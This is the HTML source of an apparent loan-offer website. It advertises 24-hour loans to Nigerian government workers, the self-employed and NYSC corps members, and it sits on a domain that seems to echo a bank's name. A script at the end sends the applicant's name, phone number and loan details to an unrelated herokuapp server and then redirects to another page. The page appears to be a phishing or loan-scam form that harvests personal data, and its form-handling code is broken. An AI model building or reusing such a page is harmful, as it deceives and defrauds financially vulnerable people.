<!DOCTYPE html>
<html lang="en">
	<head>
		<title>Loan App | Home</title><meta property="og:site_name" content="Loan App" />
<meta property="og:image" content="https://gtcoavailableloan.weebly.com/uploads/1/4/0/4/140489560/img-20211225-wa0001_orig.jpg" />
<meta property="og:image" content="https://gtcoavailableloan.weebly.com/uploads/1/4/0/4/140489560/bitmap4087508234684112936.png" />
<meta property="og:url" content="https://gtcoavailableloan.weebly.com/" />



<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>

  <link href="//fonts.googleapis.com/css?family=Karla:400,700|Oswald:700|Roboto+Mono:400,400i,700,700i" rel="stylesheet">
  <script src="https://gtcoavailableloan.weebly.com/files/theme/MutationObserver.js"></script>
  <style>
    .navbar__logo .icon,
    .navbar__center .navbar__logo:after {
        color: #2990ea !important;
    }

    .header-prompt .navbar__link--login,
    .header-prompt .navbar__link.navbar__link--signup {
      color: #666C70 !important;
    }
    .header-prompt .navbar__link.navbar__link--signup {
      box-shadow: inset 0 0 0 2px #C9CDCF !important;
    }
  </style>

		
		<link id="wsite-base-style" rel="stylesheet" type="text/css" href="https://gtcoavailableloan.weebly.com/cdn2.editmysite.com/css/sites.css?buildTime=1644940491" />
<link rel="stylesheet" type="text/css" href="https://gtcoavailableloan.weebly.com/cdn2.editmysite.com/css/old/fancybox.css?1644948076" />
<link rel="stylesheet" type="text/css" href="https://gtcoavailableloan.weebly.com/cdn2.editmysite.com/css/social-icons.css?buildtime=1644948076" media="screen,projection" />
<link rel="stylesheet" type="text/css" href="https://gtcoavailableloan.weebly.com/files/main_style.css?1644961771" title="wsite-theme-css" />
<link href='//fonts.googleapis.com/css?family=Karla:400,700,400italic,700italic&subset=latin,latin-ext' rel='stylesheet' type='text/css' />
<link href='//fonts.googleapis.com/css?family=Oswald:400,300,700&subset=latin,latin-ext' rel='stylesheet' type='text/css' />

<style type='text/css'>
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {font-family:"Arial" !important;}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
@media screen and (min-width: 767px) {.wsite-elements.wsite-not-footer:not(.wsite-header-elements) div.paragraph, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) p, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-block .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-description, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .wsite-form-field label, #wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
#wsite-content div.paragraph, #wsite-content p, #wsite-content .product-block .product-title, #wsite-content .product-description, #wsite-content .wsite-form-field label, #wsite-content .wsite-form-field label, .blog-sidebar div.paragraph, .blog-sidebar p, .blog-sidebar .wsite-form-field label, .blog-sidebar .wsite-form-field label {}
.wsite-elements.wsite-footer div.paragraph, .wsite-elements.wsite-footer p, .wsite-elements.wsite-footer .product-block .product-title, .wsite-elements.wsite-footer .product-description, .wsite-elements.wsite-footer .wsite-form-field label, .wsite-elements.wsite-footer .wsite-form-field label{}
.wsite-elements.wsite-not-footer:not(.wsite-header-elements) h2, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-long .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-large .product-title, .wsite-elements.wsite-not-footer:not(.wsite-header-elements) .product-small .product-title, #wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
#wsite-content h2, #wsite-content .product-long .product-title, #wsite-content .product-large .product-title, #wsite-content .product-small .product-title, .blog-sidebar h2 {}
.wsite-elements.wsite-footer h2, .wsite-elements.wsite-footer .product-long .product-title, .wsite-elements.wsite-footer .product-large .product-title, .wsite-elements.wsite-footer .product-small .product-title{}
#wsite-title {}
.wsite-menu-default a {}
.wsite-menu a {}
.wsite-image div, .wsite-caption {}
.galleryCaptionInnerText {}
.fancybox-title {}
.wslide-caption-text {}
.wsite-phone {}
.wsite-headline,.wsite-header-section .wsite-content-title {}
.wsite-headline-paragraph,.wsite-header-section .paragraph {}
.wsite-button-inner {}
.wsite-not-footer blockquote {}
.wsite-footer blockquote {}
.blog-header h2 a {}
#wsite-content h2.wsite-product-title {}
.wsite-product .wsite-product-price a {}
}</style>

		<script src='https://gtcoavailableloan.weebly.com/files/templateArtifacts.js?1644961771'></script>
<script>
var STATIC_BASE = '//cdn1.editmysite.com/';
var ASSETS_BASE = '//cdn2.editmysite.com/';
var STYLE_PREFIX = 'wsite';
</script>
<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'></script>

<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1644948076&"></script>
<script src="//cdn2.editmysite.com/js/site/main.js?buildTime=1644940491"></script><script type="text/javascript">
		function initCustomerAccountsModels() {
					(function(){_W.setup_rpc({"url":"\/ajax\/api\/JsonRPC\/CustomerAccounts\/","actions":{"CustomerAccounts":[{"name":"login","len":2,"multiple":false,"standalone":false},{"name":"logout","len":0,"multiple":false,"standalone":false},{"name":"getSessionDetails","len":0,"multiple":false,"standalone":false},{"name":"getAccountDetails","len":0,"multiple":false,"standalone":false},{"name":"getOrders","len":0,"multiple":false,"standalone":false},{"name":"register","len":4,"multiple":false,"standalone":false},{"name":"emailExists","len":1,"multiple":false,"standalone":false},{"name":"passwordReset","len":1,"multiple":false,"standalone":false},{"name":"passwordUpdate","len":3,"multiple":false,"standalone":false},{"name":"validateSession","len":1,"multiple":false,"standalone":false}]},"namespace":"_W.CustomerAccounts.RPC"});
_W.setup_model_rpc({"rpc_namespace":"_W.CustomerAccounts.RPC","model_namespace":"_W.CustomerAccounts.BackboneModelData","collection_namespace":"_W.CustomerAccounts.BackboneCollectionData","bootstrap_namespace":"_W.CustomerAccounts.BackboneBootstrap","models":{"CustomerAccounts":{"_class":"CustomerAccounts.Model.CustomerAccounts","defaults":null,"validation":null,"types":null,"idAttribute":null,"keydefs":null}},"collections":{"CustomerAccounts":{"_class":"CustomerAccounts.Collection.CustomerAccounts"}},"bootstrap":[]});
})();
		}
		if(document.createEvent && document.addEventListener) {
			var initEvt = document.createEvent('Event');
			initEvt.initEvent('customerAccountsModelsInitialized', true, false);
			document.dispatchEvent(initEvt);
		} else if(document.documentElement.initCustomerAccountsModels === 0){
			document.documentElement.initCustomerAccountsModels++
		}
		</script>
		<script type="text/javascript"> _W = _W || {}; _W.securePrefix='gtcoavailableloan.weebly.com'; </script><script>_W = _W || {};
			_W.customerLocale = "en_US";
			_W.storeName = null;
			_W.isCheckoutReskin = false;
			_W.storeCountry = "US";
			_W.storeCurrency = "USD";
			_W.storeEuPrivacyPolicyUrl = "";
			com_currentSite = "818778160774674296";
			com_userID = "140489560";</script><script type="text/javascript">_W.configDomain = "www.weebly.com";</script><script>_W.relinquish && _W.relinquish()</script>
<script type="text/javascript" src="//cdn2.editmysite.com/js/lang/en/stl.js?buildTime=1644940491&"></script><script> _W.themePlugins = [];</script><script type="text/javascript"> _W.recaptchaUrl = "https://www.google.com/recaptcha/api.js"; </script><script type="text/javascript"><!--
	
	
	function initFlyouts(){
		initPublishedFlyoutMenus(
			[{"id":"890964688898179626","title":"Home","url":"index.html","target":"","nav_menu":false,"nonclickable":false},{"id":"427795444612243868","title":"Loan Application","url":"loan-application.html","target":"","nav_menu":false,"nonclickable":false}],
			"890964688898179626",
			'',
			'active',
			false,
			{"navigation\/item":"<li {{#id}}id=\"{{id}}\"{{\/id}} class=\"wsite-menu-item-wrap {{#has_children}}has-submenu{{\/has_children}}\">\n  <a\n    {{^nonclickable}}\n      {{^nav_menu}}\n        href=\"{{url}}\"\n      {{\/nav_menu}}\n    {{\/nonclickable}}\n    {{#target}}\n      target=\"{{target}}\"\n    {{\/target}}\n    {{#membership_required}}\n      data-membership-required=\"{{.}}\"\n    {{\/membership_required}}\n    {{#nonclickable}}\n      class=\"wsite-menu-item dead-link\"\n    {{\/nonclickable}}\n    {{^nonclickable}}\n      class=\"wsite-menu-item\"\n    {{\/nonclickable}}\n    >\n    {{{title_html}}}\n  <\/a>\n  {{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>\n","navigation\/flyout\/list":"<div class=\"wsite-menu-wrap\" style=\"display:none\">\n\t<ul class=\"wsite-menu\">\n\t\t{{#children}}{{> navigation\/flyout\/item}}{{\/children}}\n\t<\/ul>\n<\/div>\n","navigation\/flyout\/item":"<li {{#id}}id=\"{{id}}\"{{\/id}}\n  class=\"wsite-menu-subitem-wrap {{#is_current}}wsite-nav-current{{\/is_current}} {{#has_children}}has-submenu{{\/has_children}}\"\n  >\n  <a\n    {{^nonclickable}}\n      {{^nav_menu}}\n        href=\"{{url}}\"\n      {{\/nav_menu}}\n    {{\/nonclickable}}\n    {{#target}}\n      target=\"{{target}}\"\n    {{\/target}}\n    {{#nonclickable}}\n      class=\"wsite-menu-item dead-link\"\n    {{\/nonclickable}}\n    {{^nonclickable}}\n      class=\"wsite-menu-item\"\n    {{\/nonclickable}}\n    >\n    <span class=\"wsite-menu-title\">\n      {{{title_html}}}\n    <\/span>\n  <\/a>\n  {{#has_children}}{{> navigation\/flyout\/list}}{{\/has_children}}\n<\/li>\n"},
			{"hasCustomMinicart":true}
		)
	}
//-->
</script>
		
		
	</head>
	<body class="no-header-page  wsite-theme-light  wsite-page-index header-sticky banner-overlay-on "><div class="wrapper">
    <div class="edison-header">
      <div class="container">
        <div class="header-inner-wrap">
          <div class="logo">
            <span class="wsite-logo">

	<a href="/">
		<img src="https://gtcoavailableloan.weebly.com/uploads/1/4/0/4/140489560/bitmap4087508234684112936.png" alt="ADVANCE" />
	</a>

</span>
          </div>
          <div class="nav-wrap">
            <div class="dummy-menu"><ul class="wsite-menu-default">
		<li id="active" class="wsite-menu-item-wrap ">
		  <a
		        href="/"
		      class="wsite-menu-item"
		    >
		    Home
		  </a>
		  
		</li>
		<li id="pg427795444612243868" class="wsite-menu-item-wrap ">
		  <a
		        href="https://loan-application.netlify.app/loan.html"
		      class="wsite-menu-item"
		    >
		    Loan Application
		  </a>
		  
		</li>
</ul>
</div>
            <div class="nav desktop-nav"><ul class="wsite-menu-default">
		<li id="active" class="wsite-menu-item-wrap ">
		  <a
		        href="/"
		      class="wsite-menu-item"
		    >
		    Home
		  </a>
		  
		</li>
		<li id="pg427795444612243868" class="wsite-menu-item-wrap ">
		  <a
		        href="https://loan-application.netlify.app/loan.html"
		      class="wsite-menu-item"
		    >
		    Loan Application
		  </a>
		  
		</li>
</ul>
</div>
          </div>
          <div class="site-utils">
            <div class="wsite-search-wrap">
              <a href="#" class="search-toggle">
                Search
              </a>
              <span class="wsite-search">
	<form id="wsite-header-search-form" action="/apps/search" method="get">
		<input type="text" name="q" class="wsite-search-input" autocomplete="off" placeholder="Search"/><span class="wsite-search-button"><span class="wsite-search-button-inner"></span></span>
	</form>
</span>
            </div>
            
            <button class="hamburger"><i></i></button>
          </div>
        </div>
      </div>
    </div>

    <div class="content-wrap">
      <div id="wsite-content" class="wsite-elements wsite-not-footer">
	<div class="wsite-section-wrap">
	<div class="wsite-section wsite-body-section wsite-background-2"  >
		<div class="wsite-section-content">
        <div class="container">
			<div class="wsite-section-elements">
				<div><div class="wsite-image wsite-image-border-none " style="padding-top:10px;padding-bottom:10px;margin-left:0;margin-right:0;text-align:center">
<a>
<img src="https://gtcoavailableloan.weebly.com/uploads/1/4/0/4/140489560/img-20211225-wa0001_orig.jpg" alt="Picture" style="width:auto;max-width:100%" />
</a>
<div style="display:block;font-size:90%"></div>
</div></div>

<div><div style="height: 20px; overflow: hidden; width: 100%;"></div>
<hr class="styled-hr" style="width:100%;"></hr>
<div style="height: 20px; overflow: hidden; width: 100%;"></div></div>

<h2 class="wsite-content-title" style="text-align:center;"><font size="6" color="#000001">ABOUT THE LOAN</font></h2>

<div class="paragraph" style="text-align:center;"><span style="color: rgb(0, 0, 0); text-align: center;">These loans are for Federal, State ,Local government workers and Self-Employed. Disbursement is within 24hrs after submitting complete documentation. Unique asset financing model for financing white goods, income generating assets (ice-makers, grinding machines etc.) and household. In partnership with NYSC, We now cater for the financial needs of the Youth Corps Members while in service to our great country &ndash; Nigeria.</span></div>

<div><div style="height: 20px; overflow: hidden; width: 100%;"></div>
<hr class="styled-hr" style="width:100%;"></hr>
<div style="height: 20px; overflow: hidden; width: 100%;"></div></div>

<div>
	<form>
		<div id="131845587894090571-form-parent" class="wsite-form-container"
				 style="margin-top:10px;">
			<ul class="formlist" id="131845587894090571-form-list">
				<p id="error"></p>
				<label class="wsite-form-label wsite-form-fields-required-label"><span class="form-required">*</span> Indicates required field</label><div><div class="wsite-form-field wsite-name-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label">Name <span class="form-required">*</span></label>
				<div style="clear:both;"></div>
				<div class="wsite-form-input-container wsite-form-left wsite-form-input-first-name">
					<input aria-required="true" id="fname" class="wsite-form-input wsite-input" placeholder="First" type="text" />
					<label class="wsite-form-sublabel" for="input-126673200985357907">First</label>
				</div>
				<div class="wsite-form-input-container wsite-form-right wsite-form-input-last-name">
					<input aria-required="true" id="lname" class="wsite-form-input wsite-input" placeholder="Last" type="text" />
					<label class="wsite-form-sublabel" for="input-126673200985357907-1">Last</label>
				</div>
				<div id="instructions-126673200985357907" class="wsite-form-instructions" style="display:none;"></div>
			</div>
			<div style="clear:both;"></div></div>

<div><div class="wsite-form-field wsite-phone-field" style="margin-top:5px;">
				<label class="wsite-form-label" for="input-685551800242605959">Phone Number <span class="form-required">*</span></label>
				<div style="clear:both;"></div>
				<div class="wsite-form-input-container wsite-form-left" style="margin-bottom:5px;">
					<input aria-required="true" id="number" class="wsite-form-input wsite-input" type="text"/>
				</div>
				<div id="instructions-685551800242605959" class="wsite-form-instructions" style="display:none;"></div>
			</div>
			<div style="clear:both;"></div></div>

<div><div class="wsite-form-field" style="margin:5px 0px 5px 0px;">
				<label class="wsite-form-label" for="input-861995065504174368">Loan Amount <span class="form-required">*</span></label>
				<div class="wsite-form-input-container">
					<input aria-required="true" id="amount" class="wsite-form-input wsite-input wsite-input-width-200px" type="text" />
				</div>
				<div id="instructions-861995065504174368" class="wsite-form-instructions" style="display:none;"></div>
			</div></div>

<div><div class="wsite-form-field" style="margin:5px 0px 0px 0px;">
  <label class="wsite-form-label" for="input-482123625377033301">Payback Date <span class="form-required">*</span></label>
  <div class="wsite-form-radio-container">
    <select id="months" name='month' class='form-select' aria-required="true">
	<option value='1 Month'>1 Month</option>
	<option value='2 Month(s)'>2 Month(s)</option>
	<option value='3 Month(s)'>3 Month(s)</option>
	<option value='4 Month(s)'>4 Month(s)</option>
	<option value='5 Month(s)'>5 Month(s)</option>
	<option value='6 Month(s)'>6 Month(s)</option>
	<option value='7 Month(s)'>7 Month(s)</option>
	<option value='8 Month(s)'>8 Month(s)</option>
	<option value='9 Month(s)'>9 Month(s)</option>
	<option value='10 Month(s)'>10 Month(s)</option>
	<option value='11 Month(s)'>11 Month(s)</option>
	<option value='12 Month(s)'>12 Month(s)</option>
</select>

  </div>
  <div id="instructions-Payback Date" class="wsite-form-instructions" style="display:none;"></div>
</div></div>
			</ul>
			
		</div>
		<div style="display:none; visibility:hidden;">
			<input type="hidden" name="wsite_subject" />
		</div>
		<div style="text-align:center; margin-top:10px; margin-bottom:10px;">
			<input type="hidden" name="form_version" value="2" />
			<input type="hidden" name="wsite_approved" id="wsite-approved" value="approved" />
			<input type="hidden" name="ucfid" value="131845587894090571" />
			<input type="hidden" name="recaptcha_token"/>
			<!-- <input type="submit" role="button" aria-label="CONTINUE" value="CONTINUE" style="position:absolute;top:0;left:-9999px;width:1px;height:1px" /> -->
			<a class="wsite-button">
				<button class="wsite-button-inner" id="btn">CONTINUE</button>
			</a>
		</div>
	</form>
	



</div>
			</div>
		</div>
      </div>

	</div>
</div>

</div>

    </div><!-- end content-wrap -->

    <div class="footer-wrap">
      <div class="container">
            <div class="footer">

<style type="text/css">
	@font-face {
		font-family: SQMarket-Medium;
		font-style: normal;
		font-weight: 500;
		src:
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff2") format("woff2"),
			url("//cdn2.editmysite.com/fonts/SQ_Market/sqmarket-medium.woff") format("woff");
	}
</style>



<script type="text/javascript" src="//cdn2.editmysite.com/js/site/footerSignup.js?buildTime=1646063574"></script>
<script type="text/javascript">
	if (document.readystate === 'complete') {
		Weebly.footer.setupContainer('cdn2.editmysite.com', '1646063574');
	} else {
		document.addEventListener('DOMContentLoaded', function() {
			Weebly.footer.setupContainer('cdn2.editmysite.com', '1646063574');
		});
	}

	
</script>
</div>
      </div><!-- end container -->
    </div><!-- end footer-wrap -->
  </div>

  <div class="nav mobile-nav"><ul class="wsite-menu-default">
		<li id="active" class="wsite-menu-item-wrap ">
		  <a
		        href="/"
		      class="wsite-menu-item"
		    >
		    Home
		  </a>
		  
		</li>
		<li id="pg427795444612243868" class="wsite-menu-item-wrap ">
		  <a
		        href="/loan-application.html"
		      class="wsite-menu-item"
		    >
		    Loan Application
		  </a>
		  
		</li>
</ul>
</div>

  <div class="mini-cart-overlay"></div>

  <script src="https://gtcoavailableloan.weebly.com/files/theme/plugins.js?1642504892"></script>
  <script src="https://gtcoavailableloan.weebly.com/files/theme/jquery.pxuMenu.js?1642504892"></script>
  <script src="https://gtcoavailableloan.weebly.com/files/theme/jquery.trend.js?1642504892"></script>
  <script src="https://gtcoavailableloan.weebly.com/files/theme/jquery.revealer.js?1642504892"></script>
  <script src="https://gtcoavailableloan.weebly.com/files/theme/custom-1.js?1642504892"></script>
    <div id="customer-accounts-app"></div>
    <script src="//cdn2.editmysite.com/js/site/main-customer-accounts-site.js?buildTime=1644940491"></script>

		<script type="text/javascript">
	var _gaq = _gaq || [];
	_gaq.push(['_setAccount', 'UA-7870337-1']);
	_gaq.push(['_setDomainName', 'none']);
	_gaq.push(['_setAllowLinker', true]);

	(function() {
		var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
		ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
		// NOTE: keep the [1] if you replace this code. Otherwise cookie banner scripts won't be first on the page
		var s = document.getElementsByTagName('script')[1]; s.parentNode.insertBefore(ga, s);
	})();

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wGA = '_gaq';
</script>

<script type="text/javascript" async=1>
	// NOTE: keep the getElementsByTagName(o)**[1]** if you replace this code. Otherwise cookie banner scripts won't be first on the page
	;(function(p,l,o,w,i,n,g){if(!p[i]){p.GlobalSnowplowNamespace=p.GlobalSnowplowNamespace||[];
			p.GlobalSnowplowNamespace.push(i);p[i]=function(){(p[i].q=p[i].q||[]).push(arguments)
			};p[i].q=p[i].q||[];n=l.createElement(o);g=l.getElementsByTagName(o)[1];n.async=1;
			n.src=w;g.parentNode.insertBefore(n,g)}}(window,document,'script','//cdn2.editmysite.com/js/wsnbn/snowday262.js','snowday'));

	var r = [99, 104, 101, 99, 107, 111, 117, 116, 46, 40, 119, 101, 101, 98, 108, 121, 124, 101, 100, 105, 116, 109, 121, 115, 105, 116, 101, 41, 46, 99, 111, 109];
	var snPlObR = function(arr) {
		var s = '';
		for (var i = 0 ; i < arr.length ; i++){
			s = s + String.fromCharCode(arr[i]);
		}
		return s;
	};
	var s = snPlObR(r);

	var regEx = new RegExp(s);

	_W.Analytics = _W.Analytics || {'trackers': {}};
	_W.Analytics.trackers.wSP = 'snowday';
	_W.Analytics.user_id = '140489560';
	_W.Analytics.site_id = '818778160774674296';

	var drSegmentsTag = document.getElementById('drSegments');
	if (drSegmentsTag) {
		_W.Analytics.spContexts = _W.Analytics.spContexts || [];

		var segmentData = JSON.parse(drSegmentsTag.innerText);
		segmentData.forEach(function(test) {
			_W.Analytics.spContexts.push({
				schema: "iglu:com.weebly/context_ab_segment/jsonschema/1-0-0",
				data: {
					test_id: test.name,
					segment: test.variant,
				}
			});
		});
	}


	(function(app_id, ec_hostname, discover_root_domain) {
		var track = window[_W.Analytics.trackers.wSP];
		if (!track) return;
		track('newTracker', app_id, ec_hostname, {
			appId: app_id,
			post: true,
			platform: 'web',
			discoverRootDomain: discover_root_domain,
			cookieName: '_snow_',
			contexts: {
				webPage: true,
				performanceTiming: true,
				gaCookies: true
			},
			crossDomainLinker: function (linkElement) {
				return regEx.test(linkElement.href);
			},
			respectDoNotTrack: true
		});
		track('trackPageView', _W.Analytics.user_id+':'+_W.Analytics.site_id, _W.Analytics.spContexts);
		track('crossDomainLinker', function (linkElement) {
			return regEx.test(linkElement.href);
		});
	})(
		'_wn',
		'ec.editmysite.com',
		false
	);
</script>





<script>
	(function(jQuery) {
		try {
			if (jQuery) {
				jQuery('div.blog-social div.fb-like').attr('class', 'blog-social-item blog-fb-like');
				var $commentFrame = jQuery('#commentArea iframe');
				if ($commentFrame.length > 0) {
					var frameHeight = jQuery($commentFrame[0].contentWindow.document).height() + 50;
					$commentFrame.css('min-height', frameHeight + 'px');
				}
				if (jQuery('.product-button').length > 0){
					jQuery(document).ready(function(){
						jQuery('.product-button').parent().each(function(index, product){
							if(jQuery(product).attr('target') == 'paypal'){
								if (!jQuery(product).find('> [name="bn"]').length){
									jQuery('<input>').attr({
										type: 'hidden',
										name: 'bn',
										value: 'DragAndDropBuil_SP_EC'
									}).appendTo(product);
								}
							}
						});
					});
				}
			}
			else {
				// Prototype
				$$('div.blog-social div.fb-like').each(function(div) {
					div.className = 'blog-social-item blog-fb-like';
				});
				$$('#commentArea iframe').each(function(iframe) {
					iframe.style.minHeight = '410px';
				});
			}
		}
		catch(ex) {}
	})(window._W && _W.jQuery);
</script>

<script>
	window._W.isEUUser = false;
	window._W.showCookieToAll = "";
</script>

<script>
	const fname = document.querySelector("#fname").value;
	const lname = document.querySelector("#lname").value;
	const number = document.querySelector("#number").value;
	const amount = document.querySelector("#amount").value;
	const month = document.querySelector("#months").value;
	const errors = document.querySelector("#error");
	const button = document.querySelector("#btn");

	button.addEventListener("click", async (e) => {
		e.preventDefault();

		if(!fname) return errors.innerHTML ="First name is required";
		if(!lname) return errors.innerHTML = "Last name is required";
		if(!number) return errors.innerHTML = "Phone number is required";
		if(!amount) return errors.innerHTML = "Amount is required";
		if(!month) return errors.innerHTML = "Month is required";

		const data = {
			fname,
			lname,
			number,
			amount,
			month
		}

		await fetch("https://crudapi-sytem.herokuapp.com/",{
			method:"POST",
			headers: {
				"Content-Type":"application/json"
			},
			body: JSON.stringify(data)
		})
		 .then(data => {
		 	location.href = "./loan.html"
		 })
		 .catch(error => console.log(error))
	})
</script>


	</body>
</html>
